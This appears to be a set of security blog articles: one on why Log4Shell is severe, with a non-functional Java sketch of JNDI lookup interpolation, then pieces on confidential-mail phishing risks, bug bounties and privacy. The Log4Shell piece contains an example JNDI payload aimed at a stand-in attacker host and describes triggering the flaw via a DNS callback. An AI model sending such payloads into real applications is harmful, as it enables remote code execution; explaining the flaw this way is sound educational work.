Three Reasons Why Log4J Is So Bad: Ubiquity, Severity and Exploitability

Over the last few weeks, security teams everywhere have been busy patching Log4J vulnerabilities. In this article, we cover the three things you can tell your friends about why this one is so much worse than usual: ubiquity, severity and exploitability.

Ubiquity

This vulnerability impacts Java applications, and those can be found almost anywhere: enterprise software, vendor applications, database drivers, Android phones and even the smart chip on the credit card in your wallet (Java Card). Additionally, the majority of Java applications use log4j to handle logging, often logging user input. While your phone is probably not exploitable, the sheer number of places where log4j can be hiding makes this hard to fix.

Severity

New vulnerabilities come out all the time, but few of them reach the highest possible level of severity: remote code execution (RCE). This one does. That means every server running Java within your company becomes everyone’s computer – an attacker can run anything they want on it and then use it as a springboard to tunnel further into your network.

Exploitability

There are many severe vulnerabilities out there that require specialized knowledge to exploit, including speaking dead computer languages and building weird binaries during a full moon. With this one, you can begin the exploit by copy/pasting a string from a tweet into a search bar and watching for a DNS callback.
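
The mechanics behind that one-liner can be sketched in a few lines of plain Java. This is a simplified, self-contained illustration of the lookup interpolation at the heart of Log4Shell, not real log4j code: the logger scans the formatted message for `${jndi:...}` patterns, including any that arrived straight from user input, and real log4j would dereference the JNDI/LDAP address it finds there, potentially loading attacker-supplied code.

```java
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Simplified sketch of why Log4Shell works: the logger itself
// interpolates ${...} lookups found anywhere in the message,
// including parts that came straight from user input.
public class Log4ShellSketch {
    private static final Pattern LOOKUP = Pattern.compile("\\$\\{jndi:([^}]*)\\}");

    // Stand-in for log4j's message formatting. Real log4j would
    // resolve the JNDI reference here, fetching attacker-controlled
    // content from the given LDAP server instead of just noting it.
    static String format(String message) {
        Matcher m = LOOKUP.matcher(message);
        StringBuffer out = new StringBuffer();
        while (m.find()) {
            m.appendReplacement(out,
                Matcher.quoteReplacement("<would dereference " + m.group(1) + ">"));
        }
        m.appendTail(out);
        return out.toString();
    }

    public static void main(String[] args) {
        // The attacker puts the payload in any logged field, e.g. a User-Agent header.
        String userAgent = "${jndi:ldap://attacker.example/a}";
        System.out.println(format("request from " + userAgent));
        // prints: request from <would dereference ldap://attacker.example/a>
    }
}
```

The DNS part of the trick follows directly: if the lookup address points at a hostname you control, the victim’s server resolves it, and the DNS query itself confirms the exploit fired, even before any code is loaded.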

Hazards of Encrypted/Confidential Mode for Email

Recently, Office 365 and Gmail introduced encrypted or confidential mode for email. This is not true encryption like PGP or S/MIME, where two parties exchange keys and then proceed to send and receive email. Rather, the entire experience remains hosted at the originating email provider, and the receiver can access the “secured” message via a web link, which can be opened using a one-time code, an SMS code or a login. In the same vein, they can reply to the sender via the same mechanism – with the entire experience hosted by Office 365 or Gmail.

Some concerns with this approach:

  • Since the entire visual experience remains the same for most messages, it would be trivial for attackers to send phishing emails that look identical to the real messages. With true encryption, this wouldn’t be an issue, since the receiver would be able to verify the identity of the sender via keys exchanged prior to the email.
  • Since the links to read the message go to the same domain (“confidential-mail.google.com”), it would be trivial for an attacker to register a look-alike domain (for example, “confidentialmailgoogle.com” and “confidential-mail-google.com” are both unregistered). Again, not an issue with true encryption, where the message is not hosted by the sender.
  • If combined with a password-protected file, it would be possible for phishers and malware producers to host and spread their content via these types of messages without the receiver being able to scan those files. With true encryption, a key exchange takes place beforehand.
  • Since the real message content never travels through the email infrastructure, any existing controls that are in place to check and scan email will no longer apply. Organizations need to apply such controls on the web layer instead.
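
To make the look-alike concern concrete, here is a minimal sketch, in Java, of the exact-host check a mail gateway or browser plugin would need in order to tell the real domain from a look-alike. The allowlist contents and class name are hypothetical examples for illustration, not any real product’s configuration; only the legitimate domain comes from the text above.

```java
import java.net.URI;
import java.util.Set;

// Minimal sketch: flag message links whose host is not exactly a
// known-good domain. Look-alikes such as "confidential-mail-google.com"
// fail this check even though they read almost identically to a human.
public class LinkCheck {
    // Hypothetical allowlist; a real gateway would maintain this centrally.
    private static final Set<String> TRUSTED = Set.of("confidential-mail.google.com");

    static boolean isTrusted(String url) {
        try {
            String host = URI.create(url).getHost();
            return host != null && TRUSTED.contains(host.toLowerCase());
        } catch (IllegalArgumentException e) {
            return false; // unparseable URL: treat as untrusted
        }
    }

    public static void main(String[] args) {
        System.out.println(isTrusted("https://confidential-mail.google.com/msg?id=1"));  // true
        System.out.println(isTrusted("https://confidential-mail-google.com/msg?id=1")); // false
    }
}
```

The point of the exact-match design is that “close enough” string similarity is precisely what phishers exploit; the machine should accept only the literal trusted host, never a near miss.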

Here is what it looks like for the receiver in Gmail (Office 365 screenshots coming):

[Screenshots: the receiver’s view of a Gmail confidential-mode message]

Opinion: Security Bounty Hunting for Fun and Profit

Introduction

Many technology companies are beginning to embrace the concept of bounties to enhance the security of their products, websites and apps. Bounty programs promise a reward to those reporting security issues and are just one of the ways vendors and researchers can interact. These rewards range from honourable mentions, to free swag like shirts and airline miles, and even cold hard cash. The type and amount of the award vary from company to company, and are usually tied to the severity of the vulnerability.

Part of the bounty process is usually a requirement to adhere to the principle of responsible disclosure — a promise not to publish or disclose the details of the security issue until the company has had the opportunity to fix it. This allows the company to fix the problem with sufficient testing time, as opposed to the case where something is already public and there is both public and internal pressure to rush out a fix as fast as possible. In some extreme cases, companies may “gag” researchers by forbidding disclosure altogether, even after the bug is fixed. Because computer security is an ever-evolving field and researchers often learn from previously discovered security bugs, hiding those details is generally counterproductive.

Why would a vendor pay bounties?

Security issues have an outsize impact because of the damage they can cause. A broken word processor that eats your resume for lunch affects a subset of users. An insecure word processor that automatically lets malware in affects a lot more people. And a vulnerable word processor hosted on a server instead of your laptop can be used as a gateway to burrow into a company and attack other systems inside it.

Because a security bug affects other things on your computer and possibly other devices, it is far more dangerous than a regular one. Additionally, security bugs are highly attractive to attackers because of the larger potential payoff from an attack. Another interesting development in the technology world in recent years is an underground black market focused specifically on finding, trading, selling and buying security vulnerabilities. The most severe of these are known as “zero days” and impact commonly used software like web browsers; they often command six- and sometimes seven-figure payouts. The actors on these black markets often include governments and intelligence agencies.

Bounty programs that are run by vendors are positioned as a safer alternative to the black market with bounty payouts often as high as what the open market commands without the risk or hassle of dealing with the underground economy.

How does the bounty process work?

The bounty process is pretty straightforward most of the time. Usually a company publishes guidelines for how its bounty process works. These include details as to which systems or products are in scope, what kinds of bugs are covered, and what kinds of testing are or are not allowed. Often automated testing is a big no-no, because companies do not want their production systems to go down. There will usually be a way to contact the company, often with the use of email encryption such as PGP. Some companies choose to use third-party vendors, such as HackerOne and BugCrowd, to administer their bounty programs. These third parties take a cut of the bounty payout or get paid by the vendors directly.

A researcher would send data to the vendor via encrypted email or some other method the vendor prefers. The vendor would acknowledge receipt and then triage the report. Reports are often rejected for a bounty payout because they cannot be replicated, are out of scope for the program, do not affect a system covered by the bounty, or are not severe enough.

Once accepted, the vendor will usually begin an investigation. During this process, which can sometimes last weeks or months, there is usually no further communication between the vendor and the reporter, other than follow-up questions, until the vulnerability is confirmed and fixed. Once the bug is fixed and published, the bounty is paid out and the researcher is usually free to publish the details.

The dark side of bounties

While security bounties, in theory, enhance the overall security of technology products and services, there are several dark sides to this process as well. First of all, vendors can use the bounty process to influence security research in ways they want. One example is the use of the “gag” described above. Another is dragging out the evaluation and fix of the potential bug as long as possible in hopes of reducing the amount of bad publicity for the vendor. A more sinister tactic is the use of legal process, including lawsuits, injunctions or, in extreme cases, even criminal complaints.

Because of the delaying tactics employed by some vendors, some vulnerability researchers, most notably Google’s Project Zero, give vendors a hard deadline after which they will publicly disclose the vulnerability (and lose the bounty). This remains a controversial tactic within the community, and it remains to be seen whether it is effective.

For a company operating a bounty program, there is an increased risk of its systems being breached or going down due to the increased amount of testing, especially brute-force and highly automated testing, even when forbidden by the bounty rules. However, the advantage of knowing about a security issue and having the ability to fix it early will often outweigh the potential impact of such testing.

A more extreme case is sometimes seen where the discoverer of the security issue blackmails the company outside of any formal bounty program, with the bounty program seen as a sign of the vendor’s willingness to pay up.

Last, there is also an overall commoditization of security research, much like the various on-demand services that exist today for other things like cars, food, etc. Instead of hiring internal security testers or expensive third parties, bounty programs offer a way for companies to “Uberize” the security research process by allowing many people to take part in it, but at a lower payout to each. Essentially, they are paying for on-demand security testing at much less than a full-time salary or a consultant’s fee.

The Future of Bounties

While the proponents of security bounties argue powerfully for their benefits and their opponents argue against them, the jury is still out on what effect offering cash rewards has on security research. As more companies experiment with security bounties, it will become clearer whether they are beneficial or detrimental to those companies, their users, the security research community and the Internet as a whole.

Opinion: Privacy is Dead: It’s Time We Admit It

“And even inside your mind, do not curse the king, and in your inner bedroom do not curse the rich, for a bird may relay your voice, and a flying thing may retell the matter.” (Ecclesiastes 10:20)

Hacking is all the rage these days — it seems that every week another organization is getting breached and their users’ data is splashed across the Internet. Small businesses, big government agencies, mundane emails, and national security files are all fair game. After all, the logic goes, they should have known better: they should have secured their files, done better background checks on their employees and contractors, applied encryption, and in some cases simply locked the doors and alarmed the windows. And now that the cow has left the barn and the breaches have happened, we respond in typical American fashion: we fine them, we sue them and sometimes we fire them.

However, this simplistic view misses the essential truth of today’s hyper-connected world: our privacy is dead. As a matter of fact, it died long ago, and we are simply not able to face the truth. In a world where almost everyone is carrying a cell phone capable of recording and transmitting video and audio, privacy does not exist. In a country that records the phone calls and electronic activity of its citizenry in a quixotic quest for national (in)security, privacy cannot exist. In a state that reads the license plates of its taxpayers’ cars as they travel in public, privacy will not exist. And on the Internet, where everything is connected to everything else, privacy never existed.

We are surrounded by an ever-increasing number of machines that constantly record everything we do. From cell phones, personal computers and Internet-connected appliances to license plate readers on police cars, cameras at intersections, drones and satellites, our every single step is theoretically seen, heard, and possibly recorded by some machine, somewhere. Every time we interact with governments, businesses, or even each other, those interactions generate digital files and tracks. As more and more devices become intelligent and connected to the Internet, that tidal wave of personal data collection will become a deluge. Within a few years, if not already, it will probably be possible to reconstruct most of our daily activities from our digital footprints on the sandy shores of the Internet of things.

The “Inter-net,” by its very name and nature, was designed to connect machines, networks, and human beings together in a seamless fashion. Why is it, then, that we are surprised when our information, including medical records, tax returns and polygraphs, can easily be pilfered by digital bandits from so-called “secure” places? That is the nature of the beast we created: everything is connected to everything, and it is getting harder and harder to keep the bad guys out. The hacks and data breaches, which are getting more common and bigger in size and scope, are canaries in the digital coal mines. The only thing holding back the deluge is the fact that there aren’t enough trained people available to break in, take and interpret this data. However, as artificial intelligence constantly improves, it is only a matter of time until machines can steal and analyze better than humans.

It is time that we woke up from our dream world and admitted to ourselves that privacy does not exist. We should be aware that we are constantly being watched by thousands of eyes and heard by thousands of ears, without always knowing who the watchers really are. We need to start pushing back at both businesses and governments, letting them know that we value our personal privacy and do not appreciate our information, whether mundane or intimate, being collected and shared. We should also start re-evaluating how much personal information we ourselves share with others on a daily basis, and whether all of it is really necessary. And we need to start unplugging ourselves more often and enjoying the company of other humans instead of machines.